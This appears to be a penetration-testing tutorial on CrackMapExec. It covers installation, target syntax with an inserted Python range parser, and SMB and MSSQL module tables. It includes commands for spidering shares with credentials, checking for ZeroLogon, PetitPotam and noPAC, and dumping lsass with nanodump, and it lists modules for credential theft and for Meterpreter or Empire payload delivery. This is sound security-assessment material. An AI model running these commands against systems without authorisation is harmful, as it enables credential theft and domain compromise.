CrackMapExec (also known as CME) is a post-exploitation tool that helps automate the security assessment of large Active Directory environments.
CME was designed with stealth in mind: it relies on built-in Active Directory functionality to do its work, which lets it evade most endpoint protection and IDS/IPS products.
How to Install CrackMapExec
If you are using Kali you can install it from the Kali repos, but I recommend installing it from the git source.
apt install crackmapexec
In this article I will install it on a Linux machine, but if you need to you can also run it on Windows or in Docker.
First, let's install some dependencies:
apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
git clone https://github.com/Porchetta-Industries/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec
Configure Databases
Configure new Certificate
CME Configuration folder
┌──(rfs㉿local-c2)-[~]
└─$ cd ~/.cme
Change CrackMapExec certificate
┌──(rfs㉿local-c2)-[~]
└─$ vi ~/.cme/cme.conf
┌──(rfs㉿local-c2)-[~]
└─$ openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
Target Definition
crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
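The target forms listed above, expanded into concrete host lists by a small parser. This is an added example, not CrackMapExec's own target parser: it handles the five forms shown on the page (hostname, single IP, CIDR block, last-octet range such as 192.168.1.0-28, and a file of targets) and, as an assumption that goes beyond the page, a full start-end range such as 10.0.0.1-10.0.0.67. The names expand_target, expand_targets and sample_targets_file are introduced here, the sample file contents are constructed, and treating a CIDR block as its usable addresses (network and broadcast excluded) is also an assumption.

```python
"""Expand CrackMapExec-style target specifications into individual hosts.

Added example, not CME's own parser. Mirrors the forms the page lists
(hostname, single IP, CIDR block, last-octet range, targets file) and adds,
as an assumption, a full start-end range (10.0.0.1-10.0.0.67).
"""
import ipaddress
import os
import re
import tempfile
from typing import Iterable, List

# 192.168.1.0-28 : three octets, then a start-end pair for the last octet
_LAST_OCTET_RANGE = re.compile(r"^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)(\d{1,3})-(\d{1,3})$")
# 10.0.0.1-10.0.0.67 : two complete dotted quads (assumed extension, not on the page)
_FULL_RANGE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})-(\d{1,3}(?:\.\d{1,3}){3})$")
# Hostname built from RFC 1123 labels: alphanumerics and hyphens, no edge hyphens
_HOSTNAME = re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
                       r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def expand_target(spec: str, allow_file: bool = True) -> List[str]:
    """Return the list of hosts that one target specification denotes."""
    spec = spec.strip()
    if not spec or spec.startswith("#"):
        return []                      # blank or comment line from a targets file

    path = os.path.expanduser(spec)
    if allow_file and os.path.isfile(path):
        hosts: List[str] = []
        with open(path, encoding="utf-8") as fh:
            for line in fh:
                # one spec per line; nested file references are not followed
                hosts.extend(expand_target(line, allow_file=False))
        return hosts

    if "/" in spec:                    # CIDR block, e.g. 192.168.1.0/24
        net = ipaddress.ip_network(spec, strict=False)
        return [str(h) for h in net.hosts()]

    m = _LAST_OCTET_RANGE.match(spec)
    if m:                              # e.g. 192.168.1.0-28
        prefix, start, end = m.group(1), int(m.group(2)), int(m.group(3))
        if start > end or end > 255:
            raise ValueError(f"bad last-octet range: {spec}")
        # ip_address() also validates the three leading octets
        return [str(ipaddress.ip_address(f"{prefix}{i}")) for i in range(start, end + 1)]

    m = _FULL_RANGE.match(spec)
    if m:                              # e.g. 10.0.0.1-10.0.0.67 (assumed form)
        first, last = ipaddress.ip_address(m.group(1)), ipaddress.ip_address(m.group(2))
        if first > last:
            raise ValueError(f"range start after end: {spec}")
        return [str(ipaddress.ip_address(i)) for i in range(int(first), int(last) + 1)]

    try:                               # single address
        return [str(ipaddress.ip_address(spec))]
    except ValueError:
        pass

    # Dotted digits that did not parse as an address (e.g. 192.168.1.300) are a
    # typo rather than a hostname, so reject them instead of handing them to DNS.
    if re.fullmatch(r"[\d.]+", spec) or len(spec) > 253 or not _HOSTNAME.match(spec):
        raise ValueError(f"unrecognised target: {spec}")
    return [spec]


def expand_targets(specs: Iterable[str]) -> List[str]:
    """Expand several specs (as given on one command line), de-duplicated in order."""
    seen = set()
    out: List[str] = []
    for spec in specs:
        for host in expand_target(spec):
            if host not in seen:
                seen.add(host)
                out.append(host)
    return out


def sample_targets_file() -> str:
    """Write a constructed stand-in for ~/targets.txt to a temp file; return its path."""
    fd, path = tempfile.mkstemp(prefix="targets-", suffix=".txt")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write("# constructed sample, not real infrastructure\n"
                 "ms.evilcorp.org\n192.168.1.0/30\n10.0.0.1-3\n\n")
    return path


if __name__ == "__main__":
    for spec in ("ms.evilcorp.org", "192.168.1.0/24", "192.168.1.0-28", "10.0.0.1-67"):
        print(f"{spec:20} -> {len(expand_target(spec))} host(s)")
    print(expand_targets(["192.168.1.0", "192.168.0.2", sample_targets_file()]))
```

The parser rejects malformed ranges (start after end, octet above 255) and dotted-digit typos up front; a scanner that silently skips or resolves such entries makes it hard to tell a mistyped scope from an empty one.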
CME Supported Protocols
SMB
MSSQL
LDAP
SSH
RDP
WINRM
SMB Protocol
We will start by scanning a network as an example and then a specific host on that network:
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.91
Search Text Files
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'poplab!sec' --spider C\$ --pattern txt
CME SMB Modules
Vulnerabilities
SMB Module | Description |
---|---|
ZeroLogon | Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472 |
Petitpotam | Module to check if the DC is vulnerable to PetitPotam, credit to @topotam |
ms17-010 | MS17-010, /!\ not tested outside home lab |
dfscoerce | Module to check if the DC is vulnerable to DFSCoerce, credit to @filip_dragovic/@Wh04m1001 and @topotam |
nopac | Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user |
shadowcoerce | Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam |
Credentials
Module | Description |
---|---|
gpp_autologin | Searches the domain controller for registry.xml to find autologon information and returns the username and password. |
gpp_password | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. |
handlekatz | Get lsass dump using handlekatz64 and parse the result with pypykatz |
hash_spider | Dump lsass recursively from a given hash using BH to find local admins |
keepass_discover | Search for KeePass-related files and processes. |
keepass_trigger | Set up a malicious KeePass trigger to export the database in cleartext. |
lsassy | Dump lsass and parse the result remotely with lsassy |
masky | Remotely dump domain user credentials via an ADCS and a KDC |
teams_localdb | Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database; if Teams is open we kill all Teams processes |
wdigest | Creates/Deletes the ‘UseLogonCredential’ registry key enabling WDigest cred dumping on Windows >= 8.1 |
wireless | Get key of all wireless interfaces |
Scan for SMB vulnerabilities with CME
ZeroLogon
crackmapexec smb <ip> -u '' -p '' -M zerologon
PetitPotam
crackmapexec smb <ip> -u '' -p '' -M petitpotam
noPAC
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac
Nanodump
crackmapexec smb $TARGET -u Administrator -p 'qwerty12345' -M nanodump
[*] nanodump module options:
TMP_DIR Path where process dump should be saved on target system (default: C:\Windows\Temp\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/cme/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the .dmp files are stored (default: DIR_RESULT = NANO_PATH)
MSSQL Protocol
CrackMapExec modules that target the MSSQL service.
MSSQL Modules
Module | Description |
---|---|
empire_exec | Uses Empire’s RESTful API to generate a launcher for the specified listener and executes it |
met_inject | Downloads the Meterpreter stager and injects it into memory |
mssql_priv | Enumerate and exploit MSSQL privileges |
nanodump | Get lsass dump using nanodump and parse the result with pypykatz |
test_connection | Pings a host |
web_delivery | Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module |